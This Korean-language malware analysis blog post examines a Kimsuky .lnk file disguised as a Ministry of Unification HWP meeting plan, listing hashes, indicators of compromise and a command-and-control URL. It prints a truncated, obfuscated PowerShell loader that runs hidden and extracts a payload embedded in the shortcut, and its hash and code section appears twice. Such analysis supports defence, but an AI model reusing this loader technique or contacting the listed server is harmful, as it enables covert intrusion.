김수키(Kimsuky) 사례비 지급의서로 위장한 악성코드-231025 (통일부 통일정책실)윤석열 정부의 대북 정책 관련 1.5트랙 전문가 간담회(비공개) 기획안.hwp.lnk(2023.9.14)
Contents
오늘은 북한 해킹 단체 김수키(Kimsuky) 에서 만든 악성코드인 231025 (통일부 통일정책실)윤석열 정부의 대북 정책 관련 1.5트랙 전문가 간담회(비공개) 기획안.hwp.lnk에 대해 알아보겠습니다. 먼저 해쉬값을 보겠습니다.
파일명:231025 (통일부 통일정책실)윤석열 정부의 대북 정책 관련 1.5트랙 전문가 간담회(비공개) 기획안.hwp.lnk
사이즈:8.43 KB
CRC32:c35b4048
MD5:9fa12b629ca431ebc3aa56da2d7a784a
SHA-1:e6d8c130a5d36b968e25659ce10c15ebf4390477
SHA-256:e1f7cb002b25f60f71d551df45eef5f8f05194ce181795ccb799176443e08d51
입니다.일단 해당 파일 로고만 보면 뭐~한글과 컴퓨터에서 유포를 하고 있는 파일처럼 보이지만 실제 파일은 lnk 파일 즉 링크 파일 형식으로 돼 있고 해당 파일을 실행하기 전에 해당 파일을 Cerbero Suite Advanced를 통해서 보면 다음과 같이 악성코드를 실행하고 위한 PowerShell 스크립트를 실행합니다.
해당 PowerShell 코드는 다음과 같습니다.
c (p)owershell (-)windowstyle hidden (-)nop -NoProfile -NonInteractive -c "$tmp = '%temp%';$dKPW (=)[tyPE](\"{1}{)2}{0}\" (-)f'e','IO.fI','LeMOd'); $TOw=[typE](\"{1}{2}{0}{3}\" -f'e','iO.FILe','acC','SS');(&)(\"{0}{3}{1}{2}\"(-)f'S', -Varia','ble','et') -Name (\"{0}{1}\"(-)f'ln','kpath') -Value (.(\"{1}{0}{3}{2}{4}\" -f'-','G(e)t','te','Chi(l)dI','m') (\"{1}{0}\" -f'k','*.ln'));.(\"{0}{1}({)2}\"-f 'S','et-Variab','le') -Name (\"{0}{1}\" -f 'lnkp','ath') -Value (${L(n))`kPaTh} | &(\"{2}{1}{0}\"-f '-object','e','wher') {${_}.\"l(e)n`gTh\" -eq 0x00010076}) ;&(\"{2}{0}{1}\" -f'ar' 'iable','Set-V') -Name (\"{(2)}{0}{1}\"-f'nkpa','th','l') -Value (${l`NKPA`TH} | (&)((\)"{0}{1}{3}{2}\"-f'Select-Ob','je','t','c') -ExpandProperty (\"{1}{0}\"-f'e','Nam')) .(\"{1}{3}{0}{2}\"-f '-Variab','S','le','et') -Name (\"{0}{3}{2}{1}\"-f'I','utStream','p','n') -Value (&(\"{0}{1}{2}\"-f 'New-Ob','j','ect') (\"{3}{4}{1}{2}{0}\" -f 'm','.Fi','leStrea','S','ystem.IO') (${LNK`P`ATh}, $Dkpw::\"op`eN\", $tOw::\"R`Ead\"));.(\"{1}{2}{0}\" -f'ble','Set-Vari','a') -Name (\"{0}{1}\"-f 'f','ile') -Value (.(\"{2}{1}{0}\"-f'Object','w-','Ne') (\"{0}{2}{1}\"-f 'By','[]','te') (${inPUt`Str`e`AM}.\"Le`NG`Th\"));&(\"{0}{2}{1}\"-f 'Set-Va','able','ri') -Name (\"{0}{1}\"-f'le','n') …
파일명:231025 (통일부 통일정책실)윤석열 정부의 대북 정책 관련 1.5트랙 전문가 간담회(비공개) 기획안.hwp.lnk
사이즈:8.43 KB
CRC32:c35b4048
MD5:9fa12b629ca431ebc3aa56da2d7a784a
SHA-1:e6d8c130a5d36b968e25659ce10c15ebf4390477
SHA-256:e1f7cb002b25f60f71d551df45eef5f8f05194ce181795ccb799176443e08d51
입니다.일단 해당 파일 로고만 보면 뭐~한글과 컴퓨터에서 유포를 하고 있는 파일처럼 보이지만 실제 파일은 lnk 파일 즉 링크 파일 형식으로 돼 있고 해당 파일을 실행하기 전에 해당 파일을 Cerbero Suite Advanced를 통해서 보면 다음과 같이 악성코드를 실행하고 위한 PowerShell 스크립트를 실행합니다.
해당 PowerShell 코드는 다음과 같습니다.
c (p)owershell (-)windowstyle hidden (-)nop -NoProfile -NonInteractive -c "$tmp = '%temp%';$dKPW (=)[tyPE](\"{1}{)2}{0}\" (-)f'e','IO.fI','LeMOd'); $TOw=[typE](\"{1}{2}{0}{3}\" -f'e','iO.FILe','acC','SS');(&)(\"{0}{3}{1}{2}\"(-)f'S', -Varia','ble','et') -Name (\"{0}{1}\"(-)f'ln','kpath') -Value (.(\"{1}{0}{3}{2}{4}\" -f'-','G(e)t','te','Chi(l)dI','m') (\"{1}{0}\" -f'k','*.ln'));.(\"{0}{1}({)2}\"-f 'S','et-Variab','le') -Name (\"{0}{1}\" -f 'lnkp','ath') -Value (${L(n))`kPaTh} | &(\"{2}{1}{0}\"-f '-object','e','wher') {${_}.\"l(e)n`gTh\" -eq 0x00010076}) ;&(\"{2}{0}{1}\" -f'ar' 'iable','Set-V') -Name (\"{(2)}{0}{1}\"-f'nkpa','th','l') -Value (${l`NKPA`TH} | (&)((\)"{0}{1}{3}{2}\"-f'Select-Ob','je','t','c') -ExpandProperty (\"{1}{0}\"-f'e','Nam')) .(\"{1}{3}{0}{2}\"-f '-Variab','S','le','et') -Name (\"{0}{3}{2}{1}\"-f'I','utStream','p','n') -Value (&(\"{0}{1}{2}\"-f 'New-Ob','j','ect') (\"{3}{4}{1}{2}{0}\" -f 'm','.Fi','leStrea','S','ystem.IO') (${LNK`P`ATh}, $Dkpw::\"op`eN\", $tOw::\"R`Ead\"));.(\"{1}{2}{0}\" -f'ble','Set-Vari','a') -Name (\"{0}{1}\"-f 'f','ile') -Value (.(\"{2}{1}{0}\"-f'Object','w-','Ne') (\"{0}{2}{1}\"-f 'By','[]','te') (${inPUt`Str`e`AM}.\"Le`NG`Th\"));&(\"{0}{2}{1}\"-f 'Set-Va','able','ri') -Name (\"{0}{1}\"-f'le','n') …
IoC
9fa12b629ca431ebc3aa56da2d7a784a
e1f7cb002b25f60f71d551df45eef5f8f05194ce181795ccb799176443e08d51
e6d8c130a5d36b968e25659ce10c15ebf4390477
http://www.isujeil.co.kr
http://www.isujeil.co.kr/pg/adm/img/upload1/list.php?query=1
e1f7cb002b25f60f71d551df45eef5f8f05194ce181795ccb799176443e08d51
e6d8c130a5d36b968e25659ce10c15ebf4390477
http://www.isujeil.co.kr
http://www.isujeil.co.kr/pg/adm/img/upload1/list.php?query=1